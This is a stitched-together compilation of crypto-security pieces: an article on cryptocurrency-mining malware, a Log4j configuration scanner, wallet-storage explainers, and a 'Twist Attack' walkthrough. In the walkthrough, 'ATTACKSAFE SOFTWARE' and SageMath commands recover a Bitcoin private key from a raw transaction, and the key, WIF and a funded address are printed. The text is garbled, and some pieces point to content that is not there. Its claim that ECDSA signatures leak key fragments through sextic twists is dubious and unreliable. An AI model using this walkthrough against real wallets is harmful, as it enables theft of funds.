Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. Monero is notable for its use of ring signatures (a type of digital signature) and CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along.

Cryptocurrency mining also drew cybercriminal attention

Cryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall.

Unfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as ransomware operators showed. The increasing popularity of cryptocurrencies coincides with the incidences of malware that infect systems and devices, turning them into armies of cryptocurrency-mining machines.

Cryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment on the hardware, not to mention the electricity costs to power them.

Cryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved.
Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power increases, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was halved to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. Profit is divided between the group, depending on how much effort a miner exerted.

Cryptocurrency-mining malware use similar attack vectors

Bad guys turn to using malware to skirt around these challenges. There is, however, a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify botnets of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was used to illicitly mine dogecoins. During the same year, a similar incident happened to US agency National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was misused to mine for bitcoins.

Cryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). In January 2014, a vulnerability in Yahoo!’s Java-based advertisement network was compromised, exposing European end users to malvertisements that delivered a bitcoin-mining malware. A month before it, German law enforcement arrested hackers for purportedly using malware to mine over $954,000 worth of bitcoins.
We’ve seen the emergence of hacking tools and backdoors related to cybercriminal bitcoin mining as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as distributed denial-of-service and URL spoofing. Another even tried to masquerade as a component for one of Trend Micro’s products. In 2014, the threat crossed over to Android devices as Kagecoin, capable of mining bitcoin, litecoin, and dogecoin. A remote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground was modified to add bitcoin-mining functionality. The same was done to an old Java RAT that can mine litecoin.

This year’s notable cryptocurrency-mining malware so far are Adylkuzz, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities. Adylkuzz leverages EternalBlue, the same security flaw that WannaCry ransomware used to destructive effect, while CPUMiner/EternalMiner used SambaCry, a vulnerability in interoperability software suite Samba. Linux.MulDrop.14, a Linux Trojan, targets Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets.

Cryptocurrency-mining malware’s impact makes them a credible threat

Cryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption.

But we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector.
The most prevalent of these attacks we saw were:

  • Cross-site scripting
  • Exploiting a remote code execution vulnerability in Microsoft’s Internet Information Server (IIS)
  • Brute force and default password logins/attacks
  • Command buffer overflow exploits
  • Hypertext Preprocessor (PHP) arbitrary code injection
  • SQL injection
  • BlackNurse denial of service attack

These malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. These attacks can also be the conduit from which additional malware are delivered.

Internet of Things (IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from digital video recorders (DVRs)/surveillance cameras, set-top boxes, network-attached storage (NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai surfaced with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to knock high-profile sites offline last year. Over the first three quarters of 2016, we detected a bitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras.

From January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017.

While bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent.
We found that machines running Windows had the most bitcoin mining activities, but also of note are:

  • Systems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7)
  • Devices run on Ubuntu OS, a derivative of Debian Linux OS
  • Home routers
  • Environment-monitoring devices, used in data centers
  • Android-run smart TVs and mobile devices
  • IP cameras
  • Print servers
  • Gaming consoles

[READ: How to secure your router against Mirai and home network attacks]

Cryptocurrency-mining malware can make victims a part of the problem

Cryptocurrency-mining malware can impair system performance and risk end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem.

Indeed, their adverse impact to the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices:

  • Regularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems
  • Changing or strengthening the device’s default credentials makes the device less prone to unauthorized access
  • Enabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts
  • Taking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails

IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection.
Applying the principle of least privilege, developing countermeasures against web injections, securing the email gateway, implementing best practices for corporate mobile devices, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play vital roles in securing the ecosystems they run in.

https://cryptodeeptech.ru/blockchain-attack-vectors/
Majority is not Enough: Bitcoin Mining is Vulnerable https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf
GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/PNDBjoT83zA
Source: https://cryptodeep.ru/log4j-vulnerability
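The two CVE-2021-45105 mitigations quoted in the Log4j timeline above (swap Context Lookups inside PatternLayout for %X patterns, and remove them elsewhere in the configuration when they come from external input) can be checked mechanically against a log4j2.xml file. The following is an added example, not code from the article or from Apache; the function names and the embedded sample configuration are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Matches ${ctx:key} and the escaped $${ctx:key}, the two forms the advisory names.
CTX_LOOKUP = re.compile(r"\$\$?\{ctx:([^}]*)\}")

# Constructed sample configuration (illustrative, not from a real deployment).
SAMPLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p [$${ctx:loginId}] %c - %m%n"/>
    </Console>
    <File name="Audit" fileName="logs/${ctx:tenant}/audit.log">
      <PatternLayout>
        <Pattern>%d ${ctx:requestId:-none} %m%n</Pattern>
      </PatternLayout>
    </File>
    <Console name="Safe" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p [%X{loginId}] %m%n"/>
    </Console>
  </Appenders>
</Configuration>
"""


def rewrite_pattern(pattern):
    """Swap simple context lookups for %X{key}; return (new_pattern, leftovers).

    Lookups with a default value (key:-default) or a nested lookup have no
    one-to-one %X form, so they stay in place and are reported for manual review.
    """
    leftovers = []

    def swap(match):
        key = match.group(1)
        if not key or ":-" in key or "$" in key:
            leftovers.append(match.group(0))
            return match.group(0)
        return "%X{" + key + "}"

    return CTX_LOOKUP.sub(swap, pattern), leftovers


def make_finding(location, value, is_layout_pattern):
    """Classify one hit according to which of the two mitigations applies."""
    if not is_layout_pattern:
        # Second mitigation: outside PatternLayout the reference is removed
        # when the value comes from HTTP headers or other external input.
        return {"location": location, "value": value,
                "action": "remove-if-external", "suggested": None}
    suggested, leftovers = rewrite_pattern(value)
    action = "manual-review" if leftovers else "replace"
    return {"location": location, "value": value,
            "action": action, "suggested": suggested}


def scan_config(xml_text):
    """Return one finding per attribute or text node holding a context lookup."""
    findings = []

    def walk(elem, path, in_layout):
        tag = elem.tag.rsplit("}", 1)[-1]  # drop any XML namespace
        here = path + "/" + tag
        in_layout = in_layout or tag.lower() == "patternlayout"
        for attr, value in elem.attrib.items():
            if CTX_LOOKUP.search(value):
                is_pattern = in_layout and attr.lower() == "pattern"
                findings.append(make_finding(here + "@" + attr, value, is_pattern))
        text = (elem.text or "").strip()
        if text and CTX_LOOKUP.search(text):
            is_pattern = in_layout and tag.lower() == "pattern"
            findings.append(make_finding(here + "/text()", text, is_pattern))
        for child in elem:
            walk(child, here, in_layout)

    walk(ET.fromstring(xml_text), "", False)
    return findings


if __name__ == "__main__":
    for f in scan_config(SAMPLE_CONFIG):
        print(f["action"], f["location"])
        if f["suggested"] and f["suggested"] != f["value"]:
            print("    was:", f["value"])
            print("    now:", f["suggested"])
```

A configuration that produces no findings still needs the Log4j version upgrade the timeline describes; the scan covers only the configuration-side mitigation.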
  17. CRYPTO DEEP TECH

Not long ago the elliptic package (6.5.4) for standard elliptic curves was vulnerable to various attacks, one of which is the Twist Attack. The cryptographic problem was in the implementation of secp256k1. We know that the Bitcoin cryptocurrency uses secp256k1, and this attack did not pass Bitcoin by: according to vulnerability CVE-2020-28498, the confirming parties of an ECDSA transaction transmitted, through certain points on the secp256k1 elliptic curve, partial values of the private key (simpler subgroups of 5 to 45 bits), which are called sextic twists. This process is so dangerous that it reveals encrypted data after a series of ECC operations is performed.

In this article we implement the Twist Attack on an example and show how, using certain points on the secp256k1 elliptic curve, we can obtain partial values of the private key and within 5-15 minutes restore a Bitcoin wallet using “Sagemath pollard rho function: (discrete_log_rho)” and the “Chinese Remainder Theorem”.

https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

According to a tweet by Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21

The cofactor is 3^2*13^2*3319*22639
E1: 20412485227
E2: 3319, 22639
E3: 109903, 12977017, 383229727
E4: 18979
E6: 10903, 5290657, 10833080827, 22921299619447

prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447

38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031

HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

E1: y^2 = x^3 + 1
E2: y^2 = x^3 + 2
E3: y^2 = x^3 + 3
E4: y^2 = x^3 + 4
E6: y^2 = x^3 + 6

https://attacksafe.ru/twist-attack-on-bitcoin

y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7.
In the Koblitz curve, 0 = x³ + 0 + 7
b' = -x^3 - ax.

Let's move on to the experimental part:

(Consider a Bitcoin address)

(Now consider the critically vulnerable transactions)

Let's open [TerminalGoogleColab].

We implement the Twist Attack algorithm using our 18TwistAttack repository:

git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/18TwistAttack/
ls

Install all the packages we need from requirements.txt:

sudo apt install python2-minimal
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
pip2 install -r requirements.txt

Prepare the RawTX for the attack:

RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Save it in the file: RawTX.txt

To carry out the attack we will use the “ATTACKSAFE SOFTWARE” software: www.attacksafe.ru/software

Access rights:

chmod +x attacksafe

Usage:

./attacksafe -help

  -version: software version
  -list: list of bitcoin attacks
  -tool: indicate the attack
  -gpu: enable gpu
  -time: work timeout
  -server: server mode
  -port: server port
  -open: open file
  -save: save file
  -search: vulnerability search
  -stop: stop at mode
  -max: maximum quantity in mode
  -min: minimum quantity per mode
  -speed: boost speed for mode
  -range: specific range
  -crack: crack mode
  -field: starting field
  -point: starting point
  -inject: injection regimen
  -decode: decoding mode

./attacksafe -version

Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]

"ATTACKSAFE SOFTWARE" includes all popular attacks on Bitcoin.
      Display the list of all attacks:

          ./attacksafe -list

      Select -tool: twist_attack

      To obtain certain secp256k1 points from the vulnerable ECDSA signature transaction, we added the RawTX data to a text document and saved it as the file RawTX.txt.

      Run -tool twist_attack using the “ATTACKSAFE SOFTWARE”:

          ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

      We ran this attack from -tool twist_attack and the result was saved to the file SecretPoints.txt.

      Now, to see the successful result, open the file SecretPoints.txt:

          cat SecretPoints.txt

      Result: Elliptic Curve Secret Points.

      Now let's add the obtained secp256k1 points. To do this, open the Python script discrete.py.

      To run the Python script discrete.py, install SageMath.

      Installation command:

          sudo apt-get update
          sudo apt-get install -y python3-gmpy2
          yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

      Check the SageMath installation with the command:

          sage -v
          SageMath version 9.0

      To solve the discrete logarithm (Pollard's rho algorithm for logarithms), run the Python script discrete.py.

      Run command:

          sage -python3 discrete.py

      Result:

          Discrete_log_rho:
          5663673254
          229
          19231
          43549
          11713353
          47161820
          13016
          6068
          1461826
          5248038982
          9034433903442

          PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503

          privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

      Convert the private key to HEX format. The decimal form of the private key was saved to the file privkey.txt.

      Run the Python script privkey2hex.py:

          python3 privkey2hex.py
          cat privkey2hex.txt

      Open the resulting file privkey2hex.txt.

      Private key in HEX format:

          PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617

      Open bitaddress and check:

          ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq
          WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6
          HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617

      https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/

      BALANCE: $ 775.77

      ATTACKSAFE SOFTWARE source code

      Telegram: https://t.me/cryptodeeptech

      Video: https://youtu.be/S_ZUcM2cD8I

      Source: https://cryptodeep.ru/twist-attack

      Cryptanalysis
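One defensive check against the off-curve points described in the post above, as an added example that is not part of the original post or of any project it mentions: a public-key parser that rejects every point whose coordinates do not satisfy y² = x³ + 7 over the secp256k1 field. The function names and the small sample points are constructed for illustration.

```python
"""Added example: reject public keys that are not on secp256k1.

Points on y^2 = x^3 + b with b != 7 (such as the E1..E6 curves listed in the
post) must never reach scalar multiplication with a private key.
"""

# secp256k1 domain parameters (standard values).
P = 2**256 - 2**32 - 977          # field prime
B = 7                             # curve: y^2 = x^3 + 7 (a = 0)
GX = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
GY = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8


class InvalidPoint(ValueError):
    """Raised when an encoded public key is not a valid secp256k1 point."""


def implied_b(x: int, y: int) -> int:
    """Return the b for which (x, y) satisfies y^2 = x^3 + b over GF(P).

    With a = 0 the point addition formulas never use b, so an unchecked
    point is silently processed on whatever curve this value selects.
    """
    return (y * y - x * x * x) % P


def validate_point(x: int, y: int) -> tuple:
    """Accept (x, y) only if it is a finite point on secp256k1."""
    if not (0 <= x < P and 0 <= y < P):
        raise InvalidPoint("coordinate outside the field range")
    b = implied_b(x, y)
    if b != B:
        raise InvalidPoint(f"not on secp256k1: point satisfies y^2 = x^3 + {b}")
    # secp256k1 itself has cofactor 1, so an on-curve finite point
    # needs no additional subgroup check.
    return x, y


def parse_public_key(data: bytes) -> tuple:
    """Parse a SEC1-encoded public key and validate it before any use."""
    if len(data) == 65 and data[0] == 0x04:
        # Uncompressed form carries both coordinates, so it can encode an
        # arbitrary off-curve point: the explicit check is mandatory here.
        x = int.from_bytes(data[1:33], "big")
        y = int.from_bytes(data[33:], "big")
        return validate_point(x, y)
    if len(data) == 33 and data[0] in (0x02, 0x03):
        # Compressed form: y is recomputed from the curve equation, so the
        # result is on the curve by construction or parsing fails.
        x = int.from_bytes(data[1:], "big")
        if x >= P:
            raise InvalidPoint("coordinate outside the field range")
        rhs = (pow(x, 3, P) + B) % P
        y = pow(rhs, (P + 1) // 4, P)      # square root, valid since P % 4 == 3
        if (y * y) % P != rhs:
            raise InvalidPoint("x is not the abscissa of any curve point")
        if (y & 1) != (data[0] & 1):
            y = P - y
        return validate_point(x, y)
    raise InvalidPoint("unsupported public key encoding")


def encode_uncompressed(x: int, y: int) -> bytes:
    """Helper for the samples below: build a 65-byte SEC1 encoding."""
    return b"\x04" + x.to_bytes(32, "big") + y.to_bytes(32, "big")


if __name__ == "__main__":
    # Constructed samples: the generator, and two tiny off-curve points.
    samples = {
        "generator": encode_uncompressed(GX, GY),
        "constructed (2, 3)": encode_uncompressed(2, 3),
        "constructed (1, 2)": encode_uncompressed(1, 2),
    }
    for name, blob in samples.items():
        try:
            parse_public_key(blob)
            print(f"{name}: accepted")
        except InvalidPoint as exc:
            print(f"{name}: rejected ({exc})")
```

The rejection message names the curve the point actually lies on, which is useful to log when triaging malformed keys.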
  18. CRYPTO DEEP TECH

      In the last article, “Blockchain Attack Vectors & Vulnerabilities to Smart Contracts”, we reviewed all known attacks on the blockchain. In this article we will talk about crypto threats again and we will talk about identifying vulnerabilities for Cold wallets, as well as for Hot wallets.

      Blockchain is the underlying tech layer made up of a decentralized ledger, and a very secure data structure as there are a lot of distributed nodes that participate in the consensus algorithm. In order to hack the blockchain, hackers should exploit vulnerabilities in a lot of decentralized nodes. The basic security assumption of blockchain is that it is impossible to hack so many nodes to change the state of the blockchain.

      If blockchain tech is so secure, how could it be hacked?

      The Achilles heel of the technology is the centralized nature of institutional users that manage large amounts of crypto assets (money) for their clients, while the only thing that stays between the money and the hackers is the private key. The private key should be used to sign, on blockchain transactions, the same way that a manual signature could be used to sign traditional checks. If someone steals the institutions’ private key they can create a transaction on their behalf and steal the money. Unlike bank systems – once a hacked transaction is created there is no way to reverse it – the money is literally stolen.

      Why is it important to store and safeguard your private key?

      Whoever holds the private keys has complete control over the assets associated with that key. Because blockchain transactions are instantaneous and irrevocable, users aim to keep their private key secret. The private key is only generated once, so misplacing a private key effectively renders useless all the crypto assets associated with that address. Although the optimal custody scenario has yet to be defined, it is undisputed that control of the private key is of paramount concern.
      In fact, the private key is, in essence, the real asset. Its intrinsic properties and powers mean there is no way to truly safeguard it without exception.

      Cold wallets

      “The vault of institutional custodians” are hardware devices that store Bitcoin or other cryptocurrencies on an initially internet-isolated device. In theory, the cold wallet solution is reported to be the most secure way to store cryptocurrency. Some cryptocurrency users prefer to keep their digital assets in a physical “wallet,” most often a device that looks like a USB stick; they can only be accessed by being plugged directly into a computer and require an internet connection in order for a user to access and move their cryptocurrency funds.

      There are several popular cold wallets for commercial use such as Trezor, Ledger Nano S and for enterprise and institutional investors some other devices use a combination of:

      • USB
      • Ethernet
      • SD card
      • External thumb drives
      • Dedicated air gapped machine with HSM

      The problem associated with the above hardware is usability: to gain access to the crypto asset you need to connect the cold wallet to a computer, and therefore it is exposed to the internet. By doing so you are compromising the cold wallet system through the Internet connection, thus exposing it to potential attack vectors and eventually potential cyber theft.

      Using cold wallet storage is a necessary security precaution, especially when dealing with large amounts of Bitcoin and other crypto-assets. For example, a cryptocurrency exchange or crypto fund custodian would typically offer instant withdrawals and might be responsible for hundreds of thousands of Bitcoins and other crypto assets. To minimize the possibility that hackers could steal the entire reserve in a security breach, the financial services operator would follow a standard protocol, by keeping the majority of the reserve in cold storage, while holding a smaller percentage of the assets available for day to day trade activity.
      Essentially they would not store the majority of digital assets’ private keys on their server or any other connected computer. The only amount kept on the server is the minimum required to cover anticipated customer withdrawals.

      Methods used to secure private keys for digital assets:

      • Data encryption that protects wallets with a strong password
      • Backups for digital wallets in case of computer crashes or fraud

      Cold wallets are not truly secure as, at some point, they need to send funds and by doing so they rely on bi-directional communication and are connected to the internet. This is when they can be compromised and be infected with malicious data and are extremely vulnerable to attacks. Therefore all cold wallets become hot wallets dispelling the theory of total security for institutional custodians.

      Hot wallets today have an important role as they are capable of providing easy access to funds and processing automatic transactions, however private keys of the hot wallets are stored in a method that requires that they are always connected to the internet.

      There are different types of hot wallets that take a different approach on how to store private keys. From a mathematical perspective, some duplicate private keys between different participants and others divide a private key between the participants. In other words, hot wallets today tackle the security risk by distributing private keys.

      The hot wallet participants maintain control of their private keys, so the cryptocurrency assets in the hot wallet remain under the holder’s control. However, the assets remain vulnerable to hacking, as a malicious person or group which gains access to your computer or smartphone would theoretically also be able to drain your wallet via getting access to the private key. A hot wallet’s primary advantage is that it can be used for automatic and fast access transactions.
      Individuals looking to actually make purchases with their cryptocurrency assets might choose to use a hot wallet, for instance, as the holdings in that wallet can be transferable across the internet and in general, the number of crypto assets is at a high enough value, therefore it is not worth the time and money that hackers would invest to steal. On the other hand, hot wallets are definitely vulnerable to security breaches as they have ongoing access to the internet.

      Different types of hot wallets all store the private keys on internet connected applications:

      • Basic Hot wallet – Direct connection of the private key on the Internet
      • Multisig Native Wallet – duplicates private keys – you only need to compromise two participants in order to gain access
      • Multiparty computation (MPC) – Distributes private key between 2-5 participants

      If we look at the Multisig method even with 2-3 people or entities having to confirm a particular transaction, hacker groups will spend millions on institutional targets and they only require attack vectors for 2 out of 3 in order to compromise the security. Hacker groups are willing to do this as they stand to gain hundreds of millions in stolen crypto assets.

      Even the MPC methodology is vulnerable to a variety of attack vectors. With the MPC approach, multiple non-trusting computers can each conduct computation on their own unique fragments of a larger data set to collectively produce a desired common outcome without any one node knowing the details of the others’ fragments. The private key that executes the transaction is then a collectively generated value; the proponents of MPC maintain that at no point is a single computer responsible for an actual key.

      MPC based wallets are said to be a better solution than any hardware or multisig wallets in the market. They are mathematically proven to be safer, completely off-chain, providing higher flexibility and are generally ledger agnostic.
      Unfortunately, even with the fragments on multiple devices, it is still not an entirely safe solution because sophisticated hackers might be able to linger within a cluster of machines long enough to trace and reconstruct a key. If they manage to compromise one single employee machine or server they will be able to move laterally in the network and compromise other devices which are a part of the signature method. So this can also be proved false as hacker groups are sophisticated enough to find the vulnerabilities in this method and are willing to spend millions to steal billions.

      Using the above solutions could essentially prevent a rogue employee from stealing keys on-site, or from a cold-storage facility, or from any hardware device managed entirely by the company. There are MPC wallet providers that try to limit an attacker or a rogue employee from entering a single network and collecting all of the cryptographic information they would need to authorize and sign an illegal transaction, however, this solution is also not 100% secure and merely mitigating attack vectors is just not an option when billions are at stake.

      Why should the industry care?

      As of writing this article the total market cap for cryptocurrencies has exceeded $218 billion and is now in the 10th year of existence. In the past 10 years there have been many notable hacks. All institutions with custody of large amounts of crypto assets have a responsibility to their investors to ensure the most robust security options are deployed throughout their enterprise.
      Furthermore, the hacks also lead to various other cyber damage:

      • Theft of assets – irreversible
      • Reputation damage
      • Theft of private customer data
      • Loss of jobs
      • Closing down the business

      But that’s a different article…

      Although there is a lot of volatility in the market which in part is driven by FOMO and media hype, it is critical to acknowledge that a major factor is the security of digital assets and this can affect the value of a cryptocurrency or an exchange asset valuation fundamentally altering the entire ecosystem.

      Key Takeaways:

      • A hot wallet is always connected to the internet; hence it’s prone to online attacks – but it’s more convenient for daily use.
      • A cold wallet is mostly not connected to the internet; hence, it’s less prone to online attacks – but it’s less convenient for regular use.
      • When choosing a wallet, you should consider the security, convenience, fees, supported coins, and insurance factors.

      If you are planning to buy digital assets, deciding how and where to store them is not an option, it’s a necessity. Unlike fiat currencies, cryptocurrencies live on the blockchain and require a proper storage platform known as a wallet. These wallets give you access to your crypto holdings through public and private keys. You use a public key to send and receive cryptocurrencies and a private key to confirm transactions and prove ownership of a crypto wallet. You can think of your public key as your bank account number and your private key as your PIN.

      The main difference between hot vs. cold wallets is that the former stores private keys online while the latter stores them offline. This article takes a deep dive into the hot and cold wallet debate, considerations when choosing a wallet, and using both hot and cold wallets to manage your crypto portfolio.

      What is a Hot Wallet?

      A hot wallet is a software wallet that stores public and private keys online. You can access it through your computer or smartphone when connected to the internet.
      Hot wallets are more convenient for daily use as you don’t have to plug them in and out to use them – you just need an internet connection. They are also typically free to download and use, complete with a user-friendly interface that makes it easy for anyone to get started. Hot wallets are vulnerable to attacks because they store public and private keys online, which exposes you to risks like phishing and other scams.

      Types of Hot Wallets

      There are two types of hot wallets – exchange-based, where a user opens an account with a centralized exchange that acts as the custodian of the users’ funds in their care, and non-custodial software hot wallets.

      Exchange-Based Wallets

      Exchange-based wallets are part of a centralized exchange. Centralized exchanges are custodial institutions that hold the private keys to their users’ addresses. This means that customers of such custodial financial platforms are not in total custody of their assets, as these are deposited into hot and cold wallets held by the institution. Unfortunately, this exposes users to the risk of the exchange engaging in certain activities that result in the loss of customers’ funds, as seen in the case of FTX in November 2022. Moving forward, there is an industry wide push for more transparency and to hold custodial institutions accountable for their customers’ tokens with the introduction of Proof of Reserves.

      While there is an overall drop in centralized exchange activity, exchange-based wallets are still popular, especially with retail investors, as they make it easy for users to buy and sell cryptocurrency with fiat money. Also, in the event you lose your log-in details, access to your wallet can be restored by contacting the exchange’s customer service.

      Non-Custodial Software Hot Wallets

      Non-custodial software hot wallets can be accessed through mobile, browser or desktop applications. Most of the time, they’re available across all three.
      In the case of these hot wallets, users are responsible for their own private keys and have full control over their funds. While this means your funds are safe in the event of a bank run, as they’re not stored in a custodial institution, if you lose your seed phrase, you will no longer be able to access your wallet and the crypto stored within.

      What is a Seed Phrase?

      A seed phrase is also known as a recovery phrase. This is a random list of 12, 18, or 24 words that can be used as a master key to recover crypto assets on-chain. Seed phrases generate the private key, which in turn is used to generate the public key. Wallet software typically generates a seed phrase, instructing the user to write it down before storing it safely. The seed phrase acts as a master key to unlock the user’s access to their wallet, so it must be stored safely and never online.

      When it comes to storing your seed phrase, don’t just write it on a piece of paper, which will fade over time or possibly be destroyed by water and fire. Instead, use crypto steel to record your seed phrase, and make multiple copies as backup. Never store your seed phrase on a password manager or anywhere online or on your devices. That includes not taking a photo of it, or putting it in a Google Doc or note.

      Examples of Hot Wallets

      MetaMask – Best for Exploring the Ethereum Ecosystem

      MetaMask is one of the most popular hot wallets in the crypto space and supports all EVM-compatible tokens. It’s easy to use and is available on desktop and mobile devices. Besides, it has extra in-built features for swapping, sending, and receiving crypto and collecting non-fungible tokens (NFTs) across networks.

      Exchange-Based Wallets – Easy Fiat On-Ramp

      Exchange-based hot wallets are similar to MetaMask, mostly supporting desktop and mobile devices. Exchange-based wallets connect to most banks to ensure easy onboarding, allowing new crypto users to directly buy crypto using their bank accounts instead of brokers.
      You may (or may not) have to open an account with the exchange to use their wallet services. However, as mentioned above, these exchange-based wallets are custodial, which means the exchange essentially holds your private key and your coins, promising you that you’ll be able to withdraw your coins when you want to.

      Exodus – Best for Desktop

      Exodus is the best hot wallet for desktops due to its high transaction speed, ease of use, and diverse client functionalities it provides. It’s one of the most visually appealing and intuitive wallets in the crypto space. It started as a desktop-only wallet but has expanded to support mobile devices. However, the Exodus desktop app for Windows, Linux, and Mac operating systems, is still the wallet’s primary offering.

      What is a Cold Wallet?

      A cold or hardware wallet is a physical device that stores your private keys offline, costing anywhere between $50 and $250. Cold wallets are the most secure type of crypto wallet, as they are not connected to the internet and are therefore unlikely to be compromised by hackers (unless they have access to your private keys AND the hardware wallet).

      Hardware wallets are physical devices that may resemble a USB stick or hard drives, which work by storing your pass codes, PINs and private keys on the device itself. In fact, even if the computer is infected with malware, the cold wallet remains safe as its private keys are held in a chip that never connects to the internet. So even if your computer is hacked or your online wallet is compromised, your coins will still be safe… unless your passcode and device are stolen.

      However, as cold wallets are physical objects, that also opens them up to the risk of loss through careless handling. In the unfortunate event that your crypto hardware wallet is lost or stolen, you can use your seed phrase to regenerate your private keys. So remember to keep your seed phrases safe, offline, and on hard copy.
      As cold wallets are ideal for long-term crypto storage, they’re better suited for hodling crypto than trading funds.

      Ledger

